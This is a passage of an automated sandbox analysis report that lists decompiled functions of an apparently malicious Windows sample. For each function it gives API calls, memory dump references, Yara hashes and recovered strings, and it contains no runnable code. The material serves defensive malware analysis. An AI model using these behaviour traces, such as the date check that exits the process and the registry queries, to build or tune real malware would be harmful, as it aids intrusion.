                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: be0eeaf873f8b8c11c0d00893b559976ab1668f6bab3d6d827a6b0a8a45b8050
                            • Instruction ID: 5db8d975dfb460fc96403bd036643cc8a551c9af649c7c08b47659e6a84f8dea
                            • Opcode Fuzzy Hash: be0eeaf873f8b8c11c0d00893b559976ab1668f6bab3d6d827a6b0a8a45b8050
                            • Instruction Fuzzy Hash: 96413F71A1024CABCB54EB69EC86FDE77B9FB54340F408064B609D7251EE70AA85CF92
                            Function 008F8020 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 008F8071
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F80A0
                            • StrCmpCA.SHLWAPI(00000000,00911C80), ref: 008F80E5
                            • StrCmpCA.SHLWAPI(00000000,00911C80), ref: 008F8113
                            • StrCmpCA.SHLWAPI(00000000,00911C80), ref: 008F8147
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 48227d5513226f613a64aaa6e0ec86a298eac500a671371020c2d039fd9564bf
                            • Instruction ID: 36f1345c8fbac0776fd98c302f03a5947c3cca25d0c581cac156628c284cd5c9
                            • Opcode Fuzzy Hash: 48227d5513226f613a64aaa6e0ec86a298eac500a671371020c2d039fd9564bf
                            • Instruction Fuzzy Hash: AF41A134A0051EDFCB20DF28D884EAA77B4FF89304F514599E905DB210DF71EAAACB91
                            Function 008F8190 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 008F81FB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F822A
                            • StrCmpCA.SHLWAPI(00000000,00911C80), ref: 008F8242
                            • lstrlen.KERNEL32(00000000), ref: 008F8280
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F82AF
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 52f5e46ac644d10e5f2df53fe922e7803e9ac2cab215ac55930ccbf9e3fa7d85
                            • Instruction ID: 13b7f21485ef3274f6f692976e37e54498d974418bcec667bbe7dfb0a5574f62
                            • Opcode Fuzzy Hash: 52f5e46ac644d10e5f2df53fe922e7803e9ac2cab215ac55930ccbf9e3fa7d85
                            • Instruction Fuzzy Hash: BD416C7560060ADFCB21DF7CD984BAABBB8FF44700F108569A949D7245EF74E941CB90
                            Function 00901CF0 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00901D42
                              • Part of subcall function 009019F0: lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00901A1F
                              • Part of subcall function 009019F0: lstrlen.KERNEL32(012E6CF0), ref: 00901A30
                              • Part of subcall function 009019F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00901A57
                              • Part of subcall function 009019F0: lstrcat.KERNEL32(00000000,00000000), ref: 00901A62
                              • Part of subcall function 009019F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00901A91
                              • Part of subcall function 009019F0: lstrlen.KERNEL32(00914FA4), ref: 00901AA3
                              • Part of subcall function 009019F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00901AC4
                              • Part of subcall function 009019F0: lstrcat.KERNEL32(00000000,00914FA4), ref: 00901AD0
                              • Part of subcall function 009019F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00901AFF
                            • sscanf.NTDLL ref: 00901D6A
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00901D86
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00901D96
                            • ExitProcess.KERNEL32 ref: 00901DB3
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                            • String ID:
                            • API String ID: 3040284667-0
                            • Opcode ID: ad2d7ed730808e4f3df17e85c47237c03520c45ed2656db51a3456b75bf1ab3f
                            • Instruction ID: 4ad80b312351af3b634f1e04245e4476bd6910f9593867ab310121e68d250386
                            • Opcode Fuzzy Hash: ad2d7ed730808e4f3df17e85c47237c03520c45ed2656db51a3456b75bf1ab3f
                            • Instruction Fuzzy Hash: 2921E2B5518341AF8354DF69D88489BBBF9EFC8314F408A1EF599C3260EB30D5048BA2
                            Function 00903300 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00903336
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0090333D
                            • RegOpenKeyExA.ADVAPI32(80000002,012EBCC8,00000000,00020119,?), ref: 0090335C
                            • RegQueryValueExA.ADVAPI32(?,012FE300,00000000,00000000,00000000,000000FF), ref: 00903377
                            • RegCloseKey.ADVAPI32(?), ref: 00903381
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 00431c252cf6d3ac5dd8dd3f72dbb5e8e1c996b8d56cc76fed1d2319917067c5
                            • Instruction ID: c04dc5c47abf706c3f72d7046d91258fa3e28dd70be15df2ef747af82f363d0d
                            • Opcode Fuzzy Hash: 00431c252cf6d3ac5dd8dd3f72dbb5e8e1c996b8d56cc76fed1d2319917067c5
                            • Instruction Fuzzy Hash: 9C114FB2A40245AFD710CB95ED49FEBBBBCF788B11F508229FA05D3680DB7559008BE1
                            Function 009092ED Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 376b735f35966d527e3ed39931da9a35e10e9da25f3e3c09fff391b1b4a2e1a1
                            • Instruction ID: 84d3e465f60875aae91514a7a7d11a7f445356988f29084ada78c6f5bc105eed
                            • Opcode Fuzzy Hash: 376b735f35966d527e3ed39931da9a35e10e9da25f3e3c09fff391b1b4a2e1a1
                            • Instruction Fuzzy Hash: 1041F5B050479C9EDB318B248C85BFBBBFCAF45704F1444E8E98A871C3E2759A459F60
                            Function 008E8980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 008E8996
                              • Part of subcall function 0090A3D0: std::exception::exception.LIBCMT ref: 0090A3E5
                              • Part of subcall function 0090A3D0: std::exception::exception.LIBCMT ref: 0090A40B
                            • std::_Xinvalid_argument.LIBCPMT ref: 008E89CD
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A398
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A3BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: invalid string position$string too long
                            • API String ID: 2002836212-4289949731
                            • Opcode ID: 6aed95a0858cb2e5a8a99672940d87be729c878d5d02f5305ca689cf36352678
                            • Instruction ID: b4d8bafafe32677a7c1ebbe3f0303a9d9c3b159d9be589fb6f0f06a9167258b1
                            • Opcode Fuzzy Hash: 6aed95a0858cb2e5a8a99672940d87be729c878d5d02f5305ca689cf36352678
                            • Instruction Fuzzy Hash: 5021A672700694CBC720DA5EE840A6EF799FBA2761B15093FF15ACB681CA71D841C3E6
                            Function 008E8850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 008E8883
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A398
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A3BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 2b7ca996ad5b75042ff098619bd9c004097ae4367fe159819cbbd75297829a50
                            • Instruction ID: 4873d71f2fbf5b8e981c5bf8ac64d4579ff36c2ef5b3290f4226c59970a30629
                            • Opcode Fuzzy Hash: 2b7ca996ad5b75042ff098619bd9c004097ae4367fe159819cbbd75297829a50
                            • Instruction Fuzzy Hash: 3C3197B5E005199FCB08DF59C8916ADBBB6FB89310F148269E909EF385DB30AD01CBD1
                            Function 00905B20 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                            Download Yara Rule
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00905B32
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A398
                              • Part of subcall function 0090A383: std::exception::exception.LIBCMT ref: 0090A3BE
                            • std::_Xinvalid_argument.LIBCPMT ref: 00905B45
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_std::exception::exception
                            • String ID: Sec-WebSocket-Version: 13$string too long
                            • API String ID: 1928653953-3304177573
                            • Opcode ID: 9ff38a13cd2086ee2024df62adb990d88733b512d2fe649c5a058807f503df23
                            • Instruction ID: 2395efd19976ff635ca680c763e9890c66de7e6f87383436355e3af379cfc266
                            • Opcode Fuzzy Hash: 9ff38a13cd2086ee2024df62adb990d88733b512d2fe649c5a058807f503df23
                            • Instruction Fuzzy Hash: 72115631304B418FC7319A2CE800B1B77E6ABD1B20F250B5DE091CB6C5D761E841CFA1
                            Function 00903E90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0090A640,000000FF), ref: 00903EF0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00903EF7
                            • wsprintfA.USER32 ref: 00903F07
                              • Part of subcall function 009073F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0090740E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 054708ea7389511e6372625ce8ff5d92cbf9f1d566bffe8103464027a8115e43
                            • Instruction ID: 526396954675680ac76ff45a14506d0615133ab81c9d1d336bc8fb810865fb66
                            • Opcode Fuzzy Hash: 054708ea7389511e6372625ce8ff5d92cbf9f1d566bffe8103464027a8115e43
                            • Instruction Fuzzy Hash: A201C071A40354BFE7209B95DC0EFAABB68FB49B61F448115FA05972D0CBB41900C6A1
